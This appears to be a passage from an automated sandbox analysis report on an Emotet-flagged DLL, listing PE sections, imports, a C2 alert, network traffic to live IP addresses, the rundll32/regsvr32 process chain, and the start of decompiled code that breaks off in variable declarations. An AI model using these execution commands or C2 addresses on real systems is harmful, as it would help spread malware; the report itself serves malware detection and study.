.rdata	0x38000	0x4597a	0x45a00	False	0.6705179813734291	data	6.275471599318942	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x7e000	0x3394	0xc00	False	0.18294270833333334	DOS executable (block device driver \337-\231+])	2.573523630872546	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x82000	0x192c	0x1a00	False	0.4794170673076923	data	5.1711441720039435	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gfids	0x84000	0xdc	0x200	False	0.244140625	Spectrum .TAP data "6 " - BASIC program	1.1531659578770692	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gxfg	0x85000	0x1000	0x1000	False	0.44091796875	data	5.088628746947821	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gehcont	0x86000	0xc	0x200	False	0.0390625	data	0.06116285224115448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x87000	0x1e0	0x200	False	0.52734375	data	4.724728911998389	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x88000	0x66c	0x800	False	0.537109375	data	4.9054360857170005	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x87060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, SetStdHandle, HeapReAlloc, HeapSize, SetFilePointerEx, ExitProcess, GetStdHandle, GetProcessHeap, CreateFileW, CloseHandle, GetStringTypeW, LCMapStringW, GetFileType, VirtualAlloc, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, EncodePointer, RaiseException, RtlUnwindEx, InterlockedFlushSList, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetModuleHandleExW, GetModuleFileNameW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, WriteConsoleW
USER32.dll	EndPaint, BeginPaint, InvalidateRect, GetMessageW, DefWindowProcW, CloseTouchInputHandle, GetTouchInputInfo, DestroyWindow, MessageBoxW, CreateWindowExW, RegisterClassExW, LoadStringW, ShowWindow, DispatchMessageW, RegisterTouchWindow, MessageBoxA, UnregisterTouchWindow, TranslateAcceleratorW, TranslateMessage, LoadCursorW, PostQuitMessage, UpdateWindow
GDI32.dll	Polyline, LineTo, CreatePen, MoveToEx, DeleteObject, SelectObject
ole32.dll	CoUninitialize, CoCreateInstance, CoInitialize
CRYPT32.dll	CryptStringToBinaryA

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x180013f70

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.6115.178.55.2249714802404304 11/13/22-16:55:33.271971	TCP	2404304	ET CNC Feodo Tracker Reported CnC Server TCP group 3	49714	80	192.168.2.6	115.178.55.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 13, 2022 16:55:33.271970987 CET	49714	80	192.168.2.6	115.178.55.22
Nov 13, 2022 16:55:33.564613104 CET	80	49714	115.178.55.22	192.168.2.6
Nov 13, 2022 16:55:34.070009947 CET	49714	80	192.168.2.6	115.178.55.22
Nov 13, 2022 16:55:34.362401962 CET	80	49714	115.178.55.22	192.168.2.6
Nov 13, 2022 16:55:34.866997957 CET	49714	80	192.168.2.6	115.178.55.22
Nov 13, 2022 16:55:35.159483910 CET	80	49714	115.178.55.22	192.168.2.6
Nov 13, 2022 16:55:40.693451881 CET	49718	8080	192.168.2.6	172.105.115.71
Nov 13, 2022 16:55:40.859991074 CET	8080	49718	172.105.115.71	192.168.2.6
Nov 13, 2022 16:55:40.860174894 CET	49718	8080	192.168.2.6	172.105.115.71
Nov 13, 2022 16:55:40.866486073 CET	49718	8080	192.168.2.6	172.105.115.71
Nov 13, 2022 16:55:41.032926083 CET	8080	49718	172.105.115.71	192.168.2.6
Nov 13, 2022 16:55:41.052969933 CET	8080	49718	172.105.115.71	192.168.2.6
Nov 13, 2022 16:55:41.053008080 CET	8080	49718	172.105.115.71	192.168.2.6
Nov 13, 2022 16:55:41.053162098 CET	49718	8080	192.168.2.6	172.105.115.71
Nov 13, 2022 16:55:41.117094040 CET	49718	8080	192.168.2.6	172.105.115.71
Nov 13, 2022 16:55:41.284293890 CET	8080	49718	172.105.115.71	192.168.2.6
Nov 13, 2022 16:55:41.289948940 CET	8080	49718	172.105.115.71	192.168.2.6
Nov 13, 2022 16:55:41.336256981 CET	49718	8080	192.168.2.6	172.105.115.71
Nov 13, 2022 16:55:43.595828056 CET	49718	8080	192.168.2.6	172.105.115.71
Nov 13, 2022 16:55:43.595891953 CET	49718	8080	192.168.2.6	172.105.115.71
Nov 13, 2022 16:55:43.762207031 CET	8080	49718	172.105.115.71	192.168.2.6
Nov 13, 2022 16:55:43.762233019 CET	8080	49718	172.105.115.71	192.168.2.6
Nov 13, 2022 16:55:44.387545109 CET	8080	49718	172.105.115.71	192.168.2.6
Nov 13, 2022 16:55:44.445959091 CET	49718	8080	192.168.2.6	172.105.115.71
Nov 13, 2022 16:55:47.390136003 CET	8080	49718	172.105.115.71	192.168.2.6
Nov 13, 2022 16:55:47.390193939 CET	8080	49718	172.105.115.71	192.168.2.6
Nov 13, 2022 16:55:47.390431881 CET	49718	8080	192.168.2.6	172.105.115.71
Nov 13, 2022 16:55:47.390733004 CET	49718	8080	192.168.2.6	172.105.115.71
Nov 13, 2022 16:55:47.390856981 CET	49718	8080	192.168.2.6	172.105.115.71
Nov 13, 2022 16:55:47.556953907 CET	8080	49718	172.105.115.71	192.168.2.6
Nov 13, 2022 16:55:47.557010889 CET	8080	49718	172.105.115.71	192.168.2.6

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll64.exePID: 5144, Parent PID: 3452

General

Target ID:	0
Start time:	16:54:46
Start date:	13/11/2022
Path:	C:\Windows\System32\loaddll64.exe
Wow64 process (32bit):	false
Commandline:	loaddll64.exe "C:\Users\user\Desktop\U9M1w8FHBW.dll"
Imagebase:	0x7ff7a38b0000
File size:	139776 bytes
MD5 hash:	C676FC0263EDD17D4CE7D644B8F3FCD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.263846204.000002A683620000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1128, Parent PID: 5144

General

Target ID:	1
Start time:	16:54:46
Start date:	13/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 3808, Parent PID: 5144

General

Target ID:	2
Start time:	16:54:46
Start date:	13/11/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\U9M1w8FHBW.dll",#1
Imagebase:	0x7ff7cb270000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 3360, Parent PID: 5144

General

Target ID:	3
Start time:	16:54:47
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\U9M1w8FHBW.dll
Imagebase:	0x7ff69c730000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.261350694.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.262118091.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 1972, Parent PID: 3808

General

Target ID:	4
Start time:	16:54:47
Start date:	13/11/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\Desktop\U9M1w8FHBW.dll",#1
Imagebase:	0x7ff7e96f0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.258125944.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.258558798.000002735FB40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5552, Parent PID: 5144

General

Target ID:	5
Start time:	16:54:47
Start date:	13/11/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\user\Desktop\U9M1w8FHBW.dll,DllRegisterServer
Imagebase:	0x7ff7e96f0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.263891789.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.264795358.00000188495D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 4808, Parent PID: 1972

General

Target ID:	6
Start time:	16:54:52
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Windows\system32\DChihhZAEIop\NZICbhYKmnAVT.dll"
Imagebase:	0x7ff69c730000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.768069607.0000000001040000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.769531041.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 4516, Parent PID: 3360

General

Target ID:	7
Start time:	16:54:52
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Windows\system32\YKYTbOgY\pyluVjQOzYMsbAJk.dll"
Imagebase:	0x7ff69c730000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 3192, Parent PID: 5144

General

Target ID:	8
Start time:	16:54:53
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Windows\system32\DahdrCXRHjoqlqPu\vvcfbAnuZpuTsj.dll"
Imagebase:	0x7ff69c730000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 4144, Parent PID: 5552

General

Target ID:	9
Start time:	16:54:54
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AvyZUmIIeGJLvcye\aPdTkvBLdrznCXG.dll"
Imagebase:	0x7ff69c730000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 1788, Parent PID: 3452

General

Target ID:	17
Start time:	16:55:55
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\DChihhZAEIop\NZICbhYKmnAVT.dll
Imagebase:	0x7ff69c730000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.410373620.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.409459454.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 4784, Parent PID: 1788

General

Target ID:	18
Start time:	16:56:02
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\OQOuTpy\WqdnfVdfYCxIlc.dll"
Imagebase:	0x7ff69c730000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: loaddll64.exePID: 5144, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	10.2%
Dynamic/Decrypted Code Coverage:	3%
Signature Coverage:	10.4%
Total number of Nodes:	692
Total number of Limit Nodes:	8

Executed Functions

Function 00007FFD14673FB0 Relevance: 2283.0, APIs: 11, Strings: 1292, Instructions: 2747
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00007FFD7FFD14673FB0(intOrPtr __edx, void* __edi, void* __esp, void* __rbx, long long __rcx, void* __rdx, void* __rdi, void* __rsi, long long __r8, long long _a8, intOrPtr _a16, long long _a24) {
				signed int _v24;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				char _v79;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				char _v88;
				char _v89;
				char _v90;
				char _v91;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v101;
				char _v102;
				char _v103;
				char _v104;
				char _v105;
				char _v106;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				char _v113;
				char _v114;
				char _v115;
				char _v116;
				char _v117;
				char _v118;
				char _v119;
				char _v120;
				char _v121;
				char _v122;
				char _v123;
				char _v124;
				char _v125;
				char _v126;
				char _v127;
				char _v128;
				char _v129;
				char _v130;
				char _v131;
				char _v132;
				char _v133;
				char _v134;
				char _v135;
				char _v136;
				char _v137;
				char _v138;
				char _v139;
				char _v140;
				char _v141;
				char _v142;
				char _v143;
				char _v144;
				char _v145;
				char _v146;
				char _v147;
				char _v148;
				char _v149;
				char _v150;
				char _v151;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				char _v160;
				char _v161;
				char _v162;
				char _v163;
				char _v164;
				char _v165;
				char _v166;
				char _v167;
				char _v168;
				char _v169;
				char _v170;
				char _v171;
				char _v172;
				char _v173;
				char _v174;
				char _v175;
				char _v176;
				char _v177;
				char _v178;
				char _v179;
				char _v180;
				char _v181;
				char _v182;
				char _v183;
				char _v184;
				char _v185;
				char _v186;
				char _v187;
				char _v188;
				char _v189;
				char _v190;
				char _v191;
				char _v192;
				char _v193;
				char _v194;
				char _v195;
				char _v196;
				char _v197;
				char _v198;
				char _v199;
				char _v200;
				char _v201;
				char _v202;
				char _v203;
				char _v204;
				char _v205;
				char _v206;
				char _v207;
				char _v208;
				char _v209;
				char _v210;
				char _v211;
				char _v212;
				char _v213;
				char _v214;
				char _v215;
				char _v216;
				char _v217;
				char _v218;
				char _v219;
				char _v220;
				char _v221;
				char _v222;
				char _v223;
				char _v224;
				char _v225;
				char _v226;
				char _v227;
				char _v228;
				char _v229;
				char _v230;
				char _v231;
				char _v232;
				char _v233;
				char _v234;
				char _v235;
				char _v236;
				char _v237;
				char _v238;
				char _v239;
				char _v240;
				char _v241;
				char _v242;
				char _v243;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				char _v254;
				char _v255;
				char _v256;
				char _v257;
				char _v258;
				char _v259;
				char _v260;
				char _v261;
				char _v262;
				char _v263;
				char _v264;
				char _v265;
				char _v266;
				char _v267;
				char _v268;
				char _v269;
				char _v270;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				char _v275;
				char _v276;
				char _v277;
				char _v278;
				char _v279;
				char _v280;
				char _v281;
				char _v282;
				char _v283;
				char _v284;
				char _v285;
				char _v286;
				char _v287;
				char _v288;
				char _v289;
				char _v290;
				char _v291;
				char _v292;
				char _v293;
				char _v294;
				char _v295;
				char _v296;
				char _v297;
				char _v298;
				char _v299;
				char _v300;
				char _v301;
				char _v302;
				char _v303;
				char _v304;
				char _v305;
				char _v306;
				char _v307;
				char _v308;
				char _v309;
				char _v310;
				char _v311;
				char _v312;
				char _v313;
				char _v314;
				char _v315;
				char _v316;
				char _v317;
				char _v318;
				char _v319;
				char _v320;
				char _v321;
				char _v322;
				char _v323;
				char _v324;
				char _v325;
				char _v326;
				char _v327;
				char _v328;
				char _v329;
				char _v330;
				char _v331;
				char _v332;
				char _v333;
				char _v334;
				char _v335;
				char _v336;
				char _v337;
				char _v338;
				char _v339;
				char _v340;
				char _v341;
				char _v342;
				char _v343;
				char _v344;
				char _v345;
				char _v346;
				char _v347;
				char _v348;
				char _v349;
				char _v350;
				char _v351;
				char _v352;
				char _v353;
				char _v354;
				char _v355;
				char _v356;
				char _v357;
				char _v358;
				char _v359;
				char _v360;
				char _v361;
				char _v362;
				char _v363;
				char _v364;
				char _v365;
				char _v366;
				char _v367;
				char _v368;
				char _v369;
				char _v370;
				char _v371;
				char _v372;
				char _v373;
				char _v374;
				char _v375;
				char _v376;
				char _v377;
				char _v378;
				char _v379;
				char _v380;
				char _v381;
				char _v382;
				char _v383;
				char _v384;
				char _v385;
				char _v386;
				char _v387;
				char _v388;
				char _v389;
				char _v390;
				char _v391;
				char _v392;
				char _v393;
				char _v394;
				char _v395;
				char _v396;
				char _v397;
				char _v398;
				char _v399;
				char _v400;
				char _v401;
				char _v402;
				char _v403;
				char _v404;
				char _v405;
				char _v406;
				char _v407;
				char _v408;
				char _v409;
				char _v410;
				char _v411;
				char _v412;
				char _v413;
				char _v414;
				char _v415;
				char _v416;
				char _v417;
				char _v418;
				char _v419;
				char _v420;
				char _v421;
				char _v422;
				char _v423;
				char _v424;
				char _v425;
				char _v426;
				char _v427;
				char _v428;
				char _v429;
				char _v430;
				char _v431;
				char _v432;
				char _v433;
				char _v434;
				char _v435;
				char _v436;
				char _v437;
				char _v438;
				char _v439;
				char _v440;
				char _v441;
				char _v442;
				char _v443;
				char _v444;
				char _v445;
				char _v446;
				char _v447;
				char _v448;
				char _v449;
				char _v450;
				char _v451;
				char _v452;
				char _v453;
				char _v454;
				char _v455;
				char _v456;
				char _v457;
				char _v458;
				char _v459;
				char _v460;
				char _v461;
				char _v462;
				char _v463;
				char _v464;
				char _v465;
				char _v466;
				char _v467;
				char _v468;
				char _v469;
				char _v470;
				char _v471;
				char _v472;
				char _v473;
				char _v474;
				char _v475;
				char _v476;
				char _v477;
				char _v478;
				char _v479;
				char _v480;
				char _v481;
				char _v482;
				char _v483;
				char _v484;
				char _v485;
				char _v486;
				char _v487;
				char _v488;
				char _v489;
				char _v490;
				char _v491;
				char _v492;
				char _v493;
				char _v494;
				char _v495;
				char _v496;
				char _v497;
				char _v498;
				char _v499;
				char _v500;
				char _v501;
				char _v502;
				char _v503;
				char _v504;
				char _v505;
				char _v506;
				char _v507;
				char _v508;
				char _v509;
				char _v510;
				char _v511;
				char _v512;
				char _v513;
				char _v514;
				char _v515;
				char _v516;
				char _v517;
				char _v518;
				char _v519;
				char _v520;
				char _v521;
				char _v522;
				char _v523;
				char _v524;
				char _v525;
				char _v526;
				char _v527;
				char _v528;
				char _v529;
				char _v530;
				char _v531;
				char _v532;
				char _v533;
				char _v534;
				char _v535;
				char _v536;
				char _v537;
				char _v538;
				char _v539;
				char _v540;
				char _v541;
				char _v542;
				char _v543;
				char _v544;
				char _v545;
				char _v546;
				char _v547;
				char _v548;
				char _v549;
				char _v550;
				char _v551;
				char _v552;
				char _v553;
				char _v554;
				char _v555;
				char _v556;
				char _v557;
				char _v558;
				char _v559;
				char _v560;
				char _v561;
				char _v562;
				char _v563;
				char _v564;
				char _v565;
				char _v566;
				char _v567;
				char _v568;
				char _v569;
				char _v570;
				char _v571;
				char _v572;
				char _v573;
				char _v574;
				char _v575;
				char _v576;
				char _v577;
				char _v578;
				char _v579;
				char _v580;
				char _v581;
				char _v582;
				char _v583;
				char _v584;
				char _v585;
				char _v586;
				char _v587;
				char _v588;
				char _v589;
				char _v590;
				char _v591;
				char _v592;
				char _v593;
				char _v594;
				char _v595;
				char _v596;
				char _v597;
				char _v598;
				char _v599;
				char _v600;
				char _v601;
				char _v602;
				char _v603;
				char _v604;
				char _v605;
				char _v606;
				char _v607;
				char _v608;
				char _v609;
				char _v610;
				char _v611;
				char _v612;
				char _v613;
				char _v614;
				char _v615;
				char _v616;
				char _v617;
				char _v618;
				char _v619;
				char _v620;
				char _v621;
				char _v622;
				char _v623;
				char _v624;
				char _v625;
				char _v626;
				char _v627;
				char _v628;
				char _v629;
				char _v630;
				char _v631;
				char _v632;
				char _v633;
				char _v634;
				char _v635;
				char _v636;
				char _v637;
				char _v638;
				char _v639;
				char _v640;
				char _v641;
				char _v642;
				char _v643;
				char _v644;
				char _v645;
				char _v646;
				char _v647;
				char _v648;
				char _v649;
				char _v650;
				char _v651;
				char _v652;
				char _v653;
				char _v654;
				char _v655;
				char _v656;
				char _v657;
				char _v658;
				char _v659;
				char _v660;
				char _v661;
				char _v662;
				char _v663;
				char _v664;
				char _v665;
				char _v666;
				char _v667;
				char _v668;
				char _v669;
				char _v670;
				char _v671;
				char _v672;
				char _v673;
				char _v674;
				char _v675;
				char _v676;
				char _v677;
				char _v678;
				char _v679;
				char _v680;
				char _v681;
				char _v682;
				char _v683;
				char _v684;
				char _v685;
				char _v686;
				char _v687;
				char _v688;
				char _v689;
				char _v690;
				char _v691;
				char _v692;
				char _v693;
				char _v694;
				char _v695;
				char _v696;
				char _v697;
				char _v698;
				char _v699;
				char _v700;
				char _v701;
				char _v702;
				char _v703;
				char _v704;
				char _v705;
				char _v706;
				char _v707;
				char _v708;
				char _v709;
				char _v710;
				char _v711;
				char _v712;
				char _v713;
				char _v714;
				char _v715;
				char _v716;
				char _v717;
				char _v718;
				char _v719;
				char _v720;
				char _v721;
				char _v722;
				char _v723;
				char _v724;
				char _v725;
				char _v726;
				char _v727;
				char _v728;
				char _v729;
				char _v730;
				char _v731;
				char _v732;
				char _v733;
				char _v734;
				char _v735;
				char _v736;
				char _v737;
				char _v738;
				char _v739;
				char _v740;
				char _v741;
				char _v742;
				char _v743;
				char _v744;
				char _v745;
				char _v746;
				char _v747;
				char _v748;
				char _v749;
				char _v750;
				char _v751;
				char _v752;
				char _v753;
				char _v754;
				char _v755;
				char _v756;
				char _v757;
				char _v758;
				char _v759;
				char _v760;
				char _v761;
				char _v762;
				char _v763;
				char _v764;
				char _v765;
				char _v766;
				char _v767;
				char _v768;
				char _v769;
				char _v770;
				char _v771;
				char _v772;
				char _v773;
				char _v774;
				char _v775;
				char _v776;
				char _v777;
				char _v778;
				char _v779;
				char _v780;
				char _v781;
				char _v782;
				char _v783;
				char _v784;
				char _v785;
				char _v786;
				char _v787;
				char _v788;
				char _v789;
				char _v790;
				char _v791;
				char _v792;
				char _v793;
				char _v794;
				char _v795;
				char _v796;
				char _v797;
				char _v798;
				char _v799;
				char _v800;
				char _v801;
				char _v802;
				char _v803;
				char _v804;
				char _v805;
				char _v806;
				char _v807;
				char _v808;
				char _v809;
				char _v810;
				char _v811;
				char _v812;
				char _v813;
				char _v814;
				char _v815;
				char _v816;
				char _v817;
				char _v818;
				char _v819;
				char _v820;
				char _v821;
				char _v822;
				char _v823;
				char _v824;
				char _v825;
				char _v826;
				char _v827;
				char _v828;
				char _v829;
				char _v830;
				char _v831;
				char _v832;
				char _v833;
				char _v834;
				char _v835;
				char _v836;
				char _v837;
				char _v838;
				char _v839;
				char _v840;
				char _v841;
				char _v842;
				char _v843;
				char _v844;
				char _v845;
				char _v846;
				char _v847;
				char _v848;
				char _v849;
				char _v850;
				char _v851;
				char _v852;
				char _v853;
				char _v854;
				char _v855;
				char _v856;
				char _v857;
				char _v858;
				char _v859;
				char _v860;
				char _v861;
				char _v862;
				char _v863;
				char _v864;
				char _v865;
				char _v866;
				char _v867;
				char _v868;
				char _v869;
				char _v870;
				char _v871;
				char _v872;
				char _v873;
				char _v874;
				char _v875;
				char _v876;
				char _v877;
				char _v878;
				char _v879;
				char _v880;
				char _v881;
				char _v882;
				char _v883;
				char _v884;
				char _v885;
				char _v886;
				char _v887;
				char _v888;
				char _v889;
				char _v890;
				char _v891;
				char _v892;
				char _v893;
				char _v894;
				char _v895;
				char _v896;
				char _v897;
				char _v898;
				char _v899;
				char _v900;
				char _v901;
				char _v902;
				char _v903;
				char _v904;
				char _v905;
				char _v906;
				char _v907;
				char _v908;
				char _v909;
				char _v910;
				char _v911;
				char _v912;
				char _v913;
				char _v914;
				char _v915;
				char _v916;
				char _v917;
				char _v918;
				char _v919;
				char _v920;
				char _v921;
				char _v922;
				char _v923;
				char _v924;
				char _v925;
				char _v926;
				char _v927;
				char _v928;
				char _v929;
				char _v930;
				char _v931;
				char _v932;
				char _v933;
				char _v934;
				char _v935;
				char _v936;
				char _v937;
				char _v938;
				char _v939;
				char _v940;
				char _v941;
				char _v942;
				char _v943;
				char _v944;
				char _v945;
				char _v946;
				char _v947;
				char _v948;
				char _v949;
				char _v950;
				char _v951;
				char _v952;
				char _v953;
				char _v954;
				char _v955;
				char _v956;
				char _v957;
				char _v958;
				char _v959;
				char _v960;
				char _v961;
				char _v962;
				char _v963;
				char _v964;
				char _v965;
				char _v966;
				char _v967;
				char _v968;
				char _v969;
				char _v970;
				char _v971;
				char _v972;
				char _v973;
				char _v974;
				char _v975;
				char _v976;
				char _v977;
				char _v978;
				char _v979;
				char _v980;
				char _v981;
				char _v982;
				char _v983;
				char _v984;
				char _v985;
				char _v986;
				char _v987;
				char _v988;
				char _v989;
				char _v990;
				char _v991;
